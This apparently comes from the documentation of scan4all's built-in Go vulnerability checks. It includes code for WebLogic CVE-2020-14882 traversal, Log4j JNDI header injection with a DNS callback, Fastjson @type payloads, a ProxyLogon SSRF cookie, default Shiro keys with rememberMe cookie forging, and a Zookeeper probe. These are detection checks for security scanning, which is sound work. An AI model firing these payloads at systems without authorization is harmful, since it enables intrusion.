
Overview

scan4all includes native Go POC modules for detecting critical vulnerabilities in enterprise applications. These POCs are compiled into the binary for maximum performance and reliability.

High Performance

Native Go code executes faster than interpreted templates

Critical CVEs

Focus on high-impact vulnerabilities requiring immediate attention

Enterprise Targets

Weblogic, Jenkins, Exchange, VMware, and more

Custom Logic

Multi-step detection logic (raw TCP probes, cookie encryption, out-of-band callbacks) that cannot be expressed in YAML templates

Supported Systems

Enterprise Middleware

Weblogic Vulnerabilities (11 POCs)

| CVE | Severity | Description |
|---|---|---|
| CVE-2014-4210 | Medium | SSRF vulnerability |
| CVE-2017-3506 | Critical | WLS-WSAT RCE |
| CVE-2017-10271 | Critical | WLS-WSAT deserialization RCE |
| CVE-2018-2894 | High | Arbitrary file upload |
| CVE-2019-2725 | Critical | WLS9-ASYNC deserialization RCE |
| CVE-2019-2729 | Critical | WLS9-ASYNC deserialization RCE |
| CVE-2020-2883 | Critical | IIOP/T3 deserialization RCE |
| CVE-2020-14882 | Critical | Console authentication bypass |
| CVE-2020-14883 | Critical | Console RCE |
| CVE-2021-2109 | High | Unauthorized JNDI access |

Example: CVE-2020-14882

```go
// CVE_2020_14882 requests the WebLogic console through the unauthenticated
// /console/css/ static prefix: the double-URL-encoded "../" escapes that prefix
// and reaches console.portal. An HTTP 200 whose body links to /console/dashboard
// means the console rendered without a login, so the target is vulnerable.
func CVE_2020_14882(url string) bool {
    path := "/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=a"
    if req, err := util.HttpRequset(url+path, "GET", "", false, nil); err == nil {
        if req.StatusCode == 200 && util.StrContains(req.Body, "/console/dashboard") {
            util.SendLog(req.RequestUrl, "CVE-2020-14882", "Found vuln Weblogic", "")
            return true
        }
    }
    return false
}
```

POC Directory Structure

```text
pocs_go/
├── Springboot/         # Spring framework POCs
│   ├── CVE-2022-22965.go
│   └── CVE-2022-22947.go
├── apache/             # Apache software POCs
│   ├── CVE-2020-13935.go
│   └── poc-go-zookeeper-unauth.go
├── confluence/         # Atlassian Confluence
│   ├── CVE_2021_26084.go
│   ├── CVE-2021-26085.go
│   ├── CVE_2022_26134.go
│   └── CVE_2022_26138.go
├── f5/                 # F5 BIG-IP
│   ├── CVE_2020_5902.go
│   ├── CVE_2021_22986.go
│   └── CVE_2022_1388.go
├── fastjson/           # Fastjson RCE
│   ├── check.go
│   └── payloads.go
├── gitlab/             # GitLab
│   └── CVE_2021_22205.go
├── jboss/              # JBoss
│   └── CVE_2017_12149.go
├── jenkins/            # Jenkins CI
│   ├── Unauthorized.go
│   ├── CVE_2018_1000110.go
│   ├── CVE_2018_1000861.go
│   └── CVE_2019_10003000.go
├── log4j/              # Log4Shell
│   ├── check.go
│   └── payloads.go
├── ms/                 # Microsoft products
│   ├── exchange/       # Exchange Server
│   ├── CVE_2021_26855.go
│   ├── CVE_2018_14847.go   # MikroTik
│   └── CVE-2020-0796.go    # SMBGhost
├── phpunit/            # PHPUnit
│   └── CVE_2017_9841.go
├── shiro/              # Apache Shiro
│   ├── CVE_2016_4437.go
│   └── dicts/          # Key dictionaries
├── seeyon/             # Seeyon OA (10 POCs)
├── ThinkPHP/           # ThinkPHP
│   └── check.go
├── tomcat/             # Apache Tomcat
│   ├── CVE_2017_12615.go
│   └── CVE_2020_1938.go
├── VMware/             # VMware products
│   └── vCenter/
├── weblogic/           # Oracle Weblogic (11 POCs)
└── go_poc_check.go     # Main dispatcher
```

Detection Workflow

Execution Logic

```go
import (
    "fmt"
    "net/url"
    "strings"

    "github.com/GhostTroops/scan4all/pocs_go/shiro"
    "github.com/GhostTroops/scan4all/pocs_go/tomcat"
    "github.com/GhostTroops/scan4all/pocs_go/weblogic"
)

// POCcheck is the dispatcher in go_poc_check.go: it lower-cases each fingerprint
// reported by the Wappalyzer engine and runs the Go POCs registered for it.
// Hits come back as "exp-<Tech>|<detail>" tags that end up in the scan output.
// Only a few of the cases are shown here.
func POCcheck(wappalyzertechnologies []string, URL string, finalURL string, checklog4j bool) []string {
    var technologies []string

    // Some checks (AJP, raw TCP) take host:port rather than the HTTP URL.
    HOST := URL
    if u, err := url.Parse(URL); err == nil && u.Host != "" {
        HOST = u.Host
    }

    for _, tech := range wappalyzertechnologies {
        caseStr := strings.ToLower(tech)

        switch caseStr {
        case "apache tomcat":
            if tomcat.CVE_2020_1938(HOST) { // Ghostcat speaks AJP to the host, not HTTP
                technologies = append(technologies, "exp-Tomcat|CVE-2020-1938")
            }
            if tomcat.CVE_2017_12615(URL) {
                technologies = append(technologies, "exp-Tomcat|CVE-2017-12615")
            }

        case "weblogic":
            if weblogic.CVE_2020_14882(URL) {
                technologies = append(technologies, "exp-Weblogic|CVE_2020_14882")
            }
            // ... more checks

        case "shiro":
            key := shiro.CVE_2016_4437(finalURL)
            if key != "" {
                technologies = append(technologies, fmt.Sprintf("exp-Shiro|key:%s", key))
            }
        }
    }

    return technologies
}
```
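The CVE-2020-14882 POC and the dispatcher above, as one added self-contained example. This is not scan4all's own code: it replaces util.HttpRequset with net/http, turns the switch into a lookup table (pocsByTech, RunPOCs, NewClient, CheckCVE202014882 are names chosen here), and includes a constructed httptest server, FakeWeblogic, that imitates a vulnerable and a patched console so the check can be exercised offline. Everything is standard library.

```go
package main

import (
	"fmt"
	"io"
	"log"
	"net/http"
	"net/http/httptest"
	"strings"
	"time"
)

// Probe path from the page's CVE-2020-14882 POC: the double-encoded "../" escapes the
// unauthenticated /console/css/ static prefix and reaches console.portal.
const cve202014882Path = "/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=a"

// POC is one check: it runs against a base URL and reports whether it fired.
type POC struct {
	Tag   string // tag that ends up in the scan output, e.g. "exp-Weblogic|CVE_2020_14882"
	Check func(c *http.Client, base string) (bool, error)
}

// pocsByTech replaces the switch in POCcheck with a table keyed by a lower-cased substring
// of the fingerprint, so "Oracle Weblogic" and "weblogic" both select the same POCs.
var pocsByTech = map[string][]POC{
	"weblogic": {{Tag: "exp-Weblogic|CVE_2020_14882", Check: CheckCVE202014882}},
}

// NewClient returns a client tuned for POCs: a hard timeout, and no redirect following so a
// 302 to the login page is observed instead of being chased.
func NewClient() *http.Client {
	return &http.Client{
		Timeout: 5 * time.Second,
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
}

// CheckCVE202014882 is true only when the traversal path answers HTTP 200 and the body
// carries the dashboard link that only a rendered console page contains.
func CheckCVE202014882(c *http.Client, base string) (bool, error) {
	resp, err := c.Get(strings.TrimRight(base, "/") + cve202014882Path)
	if err != nil {
		return false, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<20)) // cap the read: Content-Length is attacker-controlled
	if err != nil {
		return false, err
	}
	return resp.StatusCode == http.StatusOK && strings.Contains(string(body), "/console/dashboard"), nil
}

// RunPOCs runs every POC registered for the detected technologies. Unknown fingerprints
// run nothing; a network error is logged and does not abort the rest of the scan.
func RunPOCs(c *http.Client, technologies []string, base string) []string {
	var found []string
	for _, tech := range technologies {
		lower := strings.ToLower(tech)
		for key, pocs := range pocsByTech {
			if !strings.Contains(lower, key) {
				continue
			}
			for _, p := range pocs {
				ok, err := p.Check(c, base)
				if err != nil {
					log.Printf("%s against %s: %v", p.Tag, base, err)
					continue
				}
				if ok {
					found = append(found, p.Tag)
				}
			}
		}
	}
	return found
}

// FakeWeblogic is a constructed stand-in for the console, not a real WebLogic. /console/css/
// is unauthenticated; when vulnerable, the double-encoded traversal reaches the portal and
// renders a page linking to the dashboard. Everything else redirects to the login form.
func FakeWeblogic(vulnerable bool) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		p := r.URL.EscapedPath() // keeps the %25-encoding exactly as the client sent it
		if vulnerable && strings.HasPrefix(p, "/console/css/") && strings.Contains(p, "%252e%252e%252f") {
			fmt.Fprint(w, `<html><body><a href="/console/dashboard">Dashboard</a></body></html>`)
			return
		}
		http.Redirect(w, r, "/console/login/LoginForm.jsp", http.StatusFound)
	}))
}
```

Two details matter for false positives: the client must not follow redirects, because a patched console answers the same path with a 302 to the login form and following it would return a 200 page; and the body marker (/console/dashboard) is required on top of the status code, since many front ends return 200 for anything under /console/css/.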

Flow Diagram

(The flow diagram image is not reproduced in this text version.)

Special Detection Categories

Log4j

Comprehensive Log4j JNDI injection detection.

Features:
  • Multiple payload variations
  • Header injection testing (X-Forwarded-For, User-Agent, etc.)
  • POST parameter injection
  • Struts2 specific patterns
  • DNS callback verification

Injection Points:

```go
// Every header a typical Java web stack logs or echoes receives the same payload.
headers := map[string]string{
    "User-Agent":        payload,
    "X-Api-Version":     payload,
    "X-Forwarded-For":   payload,
    "X-Client-IP":       payload,
    "X-Remote-IP":       payload,
    "X-Real-IP":         payload,
    "Referer":           payload,
    "Cookie":            "JSESSIONID=" + payload,
    "Contact":           payload,
    "Token":             payload,
}
```

Callback Detection:

```go
// randomstr ties a DNS lookup back to this target; util.CeyeDomain is the callback
// domain configured through the ceyeapi/ceyedomain environment variables.
uri := randomstr + "." + host + "." + util.CeyeDomain
payload := "${jndi:ldap://" + uri + "}"

// Send payloads...

// A lookup containing randomstr recorded by the DNS log service proves the JNDI
// string was evaluated, whatever the HTTP responses looked like.
if util.Dnslogchek(randomstr) {
    util.SendLog(finalURL, "log4j", "Found vuln Log4J JNDI RCE", "")
    return true
}
```
Fastjson

Multiple Fastjson versions and bypass techniques.

Detected Versions:
  • 1.2.24 and earlier
  • 1.2.47 and earlier
  • 1.2.62 and earlier
  • 1.2.66 and earlier

Payloads:

```go
// Each @type payload makes a vulnerable version resolve dnslog, so the finding is
// confirmed out of band rather than from the HTTP response.
payloads := []string{
    `{"@type":"java.net.Inet4Address","val":"` + dnslog + `"}`,
    `{"@type":"java.net.Inet6Address","val":"` + dnslog + `"}`,
    `{"@type":"java.net.InetSocketAddress"...}`,
    `{"@type":"com.sun.rowset.JdbcRowSetImpl"...}`,
}
```
Exchange

ProxyLogon/ProxyShell detection.

CVE-2021-26855 (ProxyLogon):

```go
// CheckCVE_2021_26855 uses the SSRF in the Exchange front end: the
// X-AnonResource-Backend cookie makes the server proxy the request for
// /owa/auth/x.js to the backend ECP endpoint, which an unpatched server
// answers with HTTP 200.
func CheckCVE_2021_26855(host string) string {
    url := "https://" + host + "/owa/auth/x.js"
    headers := map[string]string{
        "Cookie": "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3;",
    }

    if req, err := util.HttpRequset(url, "GET", "", false, headers); err == nil {
        if req.StatusCode == 200 {
            return "Found CVE-2021-26855 ProxyLogon"
        }
    }
    return ""
}
```
Shiro

Shiro deserialization with key detection.

Key Dictionary:

```go
// Built-in key dictionary in shiro/dicts/: well-known default rememberMe AES keys
keys := []string{
    "kPH+bIxk5D2deZiIxcaaaA==",
    "4AvVhmFLUs0KTA3Kprsdag==",
    "Z3VucwAAAAAAAAAAAAAAAA==",
    // ... 100+ keys
}
```

Detection:

```go
// CVE_2016_4437 returns the first key the target accepts, i.e. a rememberMe
// cookie encrypted with it is not answered with rememberMe=deleteMe, or "" if
// none is. generateRememberMeCookie and testShiroCookie stand for the module's
// internal helpers.
func CVE_2016_4437(url string) string {
    for _, key := range keys {
        cookie := generateRememberMeCookie(key)
        if testShiroCookie(url, cookie) {
            return key
        }
    }
    return ""
}
```
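What generateRememberMeCookie and testShiroCookie have to do, as an added example that is not scan4all's code: the cookie is built the way Shiro's AesCipherService does (AES-CBC, PKCS#5 padding, random IV prepended, base64), and the key search is driven by an Oracle that reports whether the target rejected the cookie. FakeShiroOracle is a constructed stand-in that only checks padding; the plaintext is a placeholder, where a real check encrypts a Java-serialized SimplePrincipalCollection so that a live Shiro can also deserialize it. The names Oracle, EncryptRememberMe, DecryptRememberMe, FakeShiroOracle and FindShiroKey are chosen here.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"errors"
)

// Three of the well-known default keys from shiro/dicts; the real dictionary is far longer.
var ShiroKeys = []string{"kPH+bIxk5D2deZiIxcaaaA==", "4AvVhmFLUs0KTA3Kprsdag==", "Z3VucwAAAAAAAAAAAAAAAA=="}

// Oracle is what testShiroCookie observes: rejected is true when the target answered the
// cookie with Set-Cookie: rememberMe=deleteMe (decryption or deserialization failed).
type Oracle func(cookie string) (rejected bool, err error)

func newAES(keyB64 string) (cipher.Block, error) {
	key, err := base64.StdEncoding.DecodeString(keyB64)
	if err != nil {
		return nil, err
	}
	return aes.NewCipher(key) // the 16-byte dictionary keys select AES-128, as Shiro uses
}

// EncryptRememberMe reproduces the layout of Shiro's AesCipherService: AES-CBC with
// PKCS#5 padding, a random 16-byte IV prepended, the whole thing base64-encoded.
func EncryptRememberMe(keyB64 string, plaintext []byte) (string, error) {
	block, err := newAES(keyB64)
	if err != nil {
		return "", err
	}
	n := aes.BlockSize - len(plaintext)%aes.BlockSize // PKCS#5/#7: always at least one byte
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(n)}, n)...)
	out := make([]byte, aes.BlockSize+len(padded))
	if _, err := rand.Read(out[:aes.BlockSize]); err != nil {
		return "", err
	}
	cipher.NewCBCEncrypter(block, out[:aes.BlockSize]).CryptBlocks(out[aes.BlockSize:], padded)
	return base64.StdEncoding.EncodeToString(out), nil
}

// DecryptRememberMe is the server-side inverse. A wrong key fails the padding check about
// 255 times in 256; on a live Shiro the surviving cases then fail to deserialize.
func DecryptRememberMe(keyB64, cookie string) ([]byte, error) {
	block, err := newAES(keyB64)
	if err != nil {
		return nil, err
	}
	raw, err := base64.StdEncoding.DecodeString(cookie)
	if err != nil || len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, errors.New("malformed cookie")
	}
	pt := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, raw[:aes.BlockSize]).CryptBlocks(pt, raw[aes.BlockSize:])
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return pt[:len(pt)-n], nil
}

// FakeShiroOracle is a constructed stand-in for a Shiro app holding serverKey. It only
// checks padding; an HTTP oracle would send the cookie and look for rememberMe=deleteMe.
func FakeShiroOracle(serverKey string) Oracle {
	return func(cookie string) (bool, error) {
		_, err := DecryptRememberMe(serverKey, cookie)
		return err != nil, nil
	}
}

// FindShiroKey mirrors CVE_2016_4437 with one extra guard: a junk cookie must be rejected
// first, otherwise a target that ignores rememberMe would "accept" every key in the list.
func FindShiroKey(probe Oracle, keys []string) (string, error) {
	if rejected, err := probe("junk"); err != nil || !rejected {
		return "", errors.Join(err, errors.New("precheck failed: a junk cookie must be answered with rememberMe=deleteMe"))
	}
	// Placeholder plaintext: a real check encrypts a Java-serialized SimplePrincipalCollection.
	pt := []byte("placeholder, not a serialized Java object")
	for _, k := range keys {
		cookie, err := EncryptRememberMe(k, pt)
		if err != nil {
			return "", err
		}
		if rejected, err := probe(cookie); err != nil {
			return "", err
		} else if !rejected {
			return k, nil
		}
	}
	return "", nil
}
```

The precheck is the part worth copying into a real scanner: without it, any application that simply ignores an unknown rememberMe cookie is reported with whatever key comes first in the dictionary. Against a live Shiro a wrong key can still pass the padding check by chance (about one attempt in 256), which is why real checks encrypt a valid serialized object and let the deserialization step act as the second filter.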

OA System Coverage

Chinese OA Systems

10 Vulnerability POCs:

| POC | Type |
|---|---|
| SeeyonFastjson | RCE |
| SessionUpload | File Upload |
| CNVD-2019-19299 | File Upload |
| CNVD-2020-62422 | File Read |
| CNVD-2021-01627 | SQL Injection |
| CreateMysql | SQL Injection |
| DownExcelBeanServlet | Info Leak |
| GetSessionList | Session Disclosure |
| InitDataAssess | Auth Bypass |
| ManagementStatus | Info Leak |

Network Protocol Checks

SMB:
  • MS17-010 detection (EternalBlue)
  • SMBGhost (CVE-2020-0796)
DCOM:
  • Port 135 interface enumeration
  • Remote interface discovery
NetBIOS:
  • NetBIOS enumeration
  • Workstation information
Zookeeper:

Unauthorized access detection:

```go
import (
    "net"
    "strings"
    "time"
)

// ZookeeperUnauthority sends the "stat" four-letter-word command to a Zookeeper
// client port (url is host:port, not an HTTP URL). A version banner in the reply
// means the admin commands are reachable without authentication. Dial, write and
// read all carry a deadline so a silent port cannot stall the scan.
func ZookeeperUnauthority(url string) bool {
    conn, err := net.DialTimeout("tcp", url, 5*time.Second)
    if err != nil {
        return false
    }
    defer conn.Close()
    conn.SetDeadline(time.Now().Add(5 * time.Second))

    // Send stat command
    if _, err := conn.Write([]byte("stat\n")); err != nil {
        return false
    }

    // Read response
    buf := make([]byte, 1024)
    n, err := conn.Read(buf)
    if err != nil || n == 0 {
        return false
    }

    return strings.Contains(string(buf[:n]), "Zookeeper version")
}
```
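The same four-letter-word check as an added, testable example (not the project's code): ZookeeperStatExposed reads the whole reply rather than a single 1024-byte chunk, tolerates a read deadline from a server that keeps the socket open, and distinguishes the 3.5+ whitelist refusal from a real banner. FakeZookeeper is a constructed loopback listener used to run it offline; OpenReply and RefusedReply are constructed sample replies, and all names here are chosen for this example.

```go
package main

import (
	"bufio"
	"errors"
	"io"
	"net"
	"strings"
	"time"
)

// Constructed replies: an open 3.4 server, and a 3.5+ server whose 4lw.commands.whitelist
// does not include stat (the build hash a real banner carries is left out).
const (
	OpenReply    = "Zookeeper version: 3.4.14, built on 01/01/2019 00:00 GMT\nClients:\n /127.0.0.1:54321[0](queued=0,recved=1,sent=0)\n\nLatency min/avg/max: 0/0/0\nMode: standalone\nNode count: 4\n"
	RefusedReply = "stat is not executed because it is not in the whitelist.\n"
)

// ZookeeperStatExposed sends the "stat" four-letter word to addr (host:port). It returns true,
// plus the first reply line, when the answer carries a version string, i.e. the admin commands
// are reachable without authentication. A whitelist refusal or a silent port yields false.
// Dial, write and read share one deadline so a half-open port cannot stall the scan.
func ZookeeperStatExposed(addr string, timeout time.Duration) (bool, string, error) {
	conn, err := net.DialTimeout("tcp", addr, timeout)
	if err != nil {
		return false, "", err
	}
	defer conn.Close()
	if err := conn.SetDeadline(time.Now().Add(timeout)); err != nil {
		return false, "", err
	}
	if _, err := conn.Write([]byte("stat\n")); err != nil {
		return false, "", err
	}
	// Zookeeper closes the connection after answering a four-letter word, so read to EOF.
	// A read deadline from a server that keeps the socket open is not treated as an error.
	reply, err := io.ReadAll(io.LimitReader(conn, 8192))
	var nerr net.Error
	if err != nil && !(errors.As(err, &nerr) && nerr.Timeout()) {
		return false, "", err
	}
	banner := strings.TrimSpace(strings.SplitN(string(reply), "\n", 2)[0])
	return strings.Contains(string(reply), "Zookeeper version"), banner, nil
}

// FakeZookeeper is a constructed listener on a random loopback port that answers "stat" with
// reply and then closes, as a real server does. It returns the address and a stop function.
func FakeZookeeper(reply string) (addr string, stop func()) {
	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		panic(err)
	}
	go func() {
		for {
			c, err := ln.Accept()
			if err != nil {
				return // listener closed by stop()
			}
			go func(c net.Conn) {
				defer c.Close()
				c.SetDeadline(time.Now().Add(2 * time.Second))
				line, err := bufio.NewReader(c).ReadString('\n')
				if err == nil && strings.TrimSpace(line) == "stat" {
					io.WriteString(c, reply)
				}
			}(c)
		}
	}()
	return ln.Addr().String(), func() { ln.Close() }
}
```

Returning the banner line alongside the boolean gives the report the version string, which is what a triage analyst needs to decide whether the exposure is also an upgrade problem.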

Configuration

Automatic Execution

Go POCs execute automatically when matching fingerprints are detected:

```bash
# No special configuration needed
./scan4all -host target.com
```

Enable Log4j Scanning

```bash
# Log4j requires DNS callback configuration
export ceyeapi="your-api-key"
export ceyedomain="your.ceye.io"
./scan4all -host target.com
```

Filter by Technology

```go
// Internal fingerprint matching (illustrative): a POC group runs only when the
// fingerprint engine has reported the matching technology
if fingerprint.Contains("Apache Tomcat") {
    // Execute Tomcat POCs
}
```

Performance

Native Speed

Compiled Go code executes 10-100x faster than interpreted templates

Low Overhead

Minimal memory footprint and CPU usage

Concurrent Execution

Multiple POCs run in parallel per target

Early Detection

Critical vulns detected first in scan workflow

Output Format

```text
http://target.com [200] [Oracle Weblogic] [exp-Weblogic|CVE_2020_14882] [http://target.com/console]
http://target.com [200] [Apache Shiro] [exp-Shiro|key:Z3VucwAAAAAAAAAAAAAAAA==] [http://target.com]
http://target.com [200] [Apache Tomcat] [exp-Tomcat|CVE-2020-1938] [http://target.com]
```

Format: URL [Status] [Technology] [Vulnerability|Details] [Final URL]
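A parser for that output format, added here for anyone feeding scan4all results into a ticketing or SIEM pipeline (it is not part of scan4all). It keeps to the five-field shape documented above, splits the Vulnerability|Details field, and reports malformed lines separately instead of silently dropping them. Finding, ParseResultLine and ParseResults are names chosen here; SampleOutput is the page's three lines plus one constructed bad line.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"regexp"
	"strconv"
	"strings"
)

// Finding is one parsed line of scan4all output:
// URL [Status] [Technology] [Vulnerability|Details] [Final URL]
type Finding struct {
	URL        string
	Status     int
	Technology string
	Check      string // e.g. "exp-Weblogic", "exp-Shiro"
	Detail     string // text after the '|', e.g. "CVE_2020_14882" or "key:..."
	FinalURL   string
}

// lineRe anchors on the documented five-field shape; bracketed fields may contain spaces
// (e.g. "Oracle Weblogic") but never ']'.
var lineRe = regexp.MustCompile(`^(\S+) \[(\d{3})\] \[([^\]]*)\] \[([^\]]*)\] \[([^\]]*)\]$`)

// ParseResultLine parses one line; lines in any other shape are rejected rather than guessed at.
func ParseResultLine(line string) (Finding, error) {
	m := lineRe.FindStringSubmatch(strings.TrimSpace(line))
	if m == nil {
		return Finding{}, fmt.Errorf("unrecognised result line: %q", line)
	}
	status, _ := strconv.Atoi(m[2]) // \d{3} already guarantees a number
	check, detail, _ := strings.Cut(m[4], "|")
	return Finding{URL: m[1], Status: status, Technology: m[3], Check: check, Detail: detail, FinalURL: m[5]}, nil
}

// ParseResults reads a whole output stream, skipping blank lines; malformed lines are
// returned separately so a pipeline can alert on them instead of losing findings.
func ParseResults(r io.Reader) (findings []Finding, bad []string) {
	sc := bufio.NewScanner(r)
	for sc.Scan() {
		if strings.TrimSpace(sc.Text()) == "" {
			continue
		}
		f, err := ParseResultLine(sc.Text())
		if err != nil {
			bad = append(bad, sc.Text())
			continue
		}
		findings = append(findings, f)
	}
	return findings, bad
}

// SampleOutput: the page's three example lines plus one constructed malformed line.
const SampleOutput = `http://target.com [200] [Oracle Weblogic] [exp-Weblogic|CVE_2020_14882] [http://target.com/console]
http://target.com [200] [Apache Shiro] [exp-Shiro|key:Z3VucwAAAAAAAAAAAAAAAA==] [http://target.com]
http://target.com [200] [Apache Tomcat] [exp-Tomcat|CVE-2020-1938] [http://target.com]
garbage line without brackets
`
```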

Development

See Custom POCs for detailed information on creating Go POC modules.

Quick Example

```go
package myservice

import (
    "github.com/GhostTroops/scan4all/lib/util"
)

// CVE_XXXX_XXXXX is the skeleton of a Go POC: one request, one precise marker,
// one log line. Replace the path, the marker and the CVE identifier.
func CVE_XXXX_XXXXX(url string) bool {
    // Build exploit URL
    exploitPath := "/vulnerable/endpoint?param=payload"

    // Send request
    if req, err := util.HttpRequset(url+exploitPath, "GET", "", false, nil); err == nil {
        // Check for vulnerability indicators: status code alone is not enough
        if req.StatusCode == 200 && util.StrContains(req.Body, "vulnerable_marker") {
            util.SendLog(url, "CVE-XXXX-XXXXX", "Vulnerability found", "")
            return true
        }
    }

    return false
}
```

Best Practices

Specific Detection

Use precise vulnerability markers to avoid false positives

Error Handling

Always handle network errors gracefully

Logging

Report findings with sufficient context

Performance

Keep POCs fast - they run on every matching target

Custom POCs

Learn to develop your own Go POC modules

Xray POCs

YAML-based POC system

Fingerprinting

Technology detection system

Development Guide

Extend scan4all capabilities
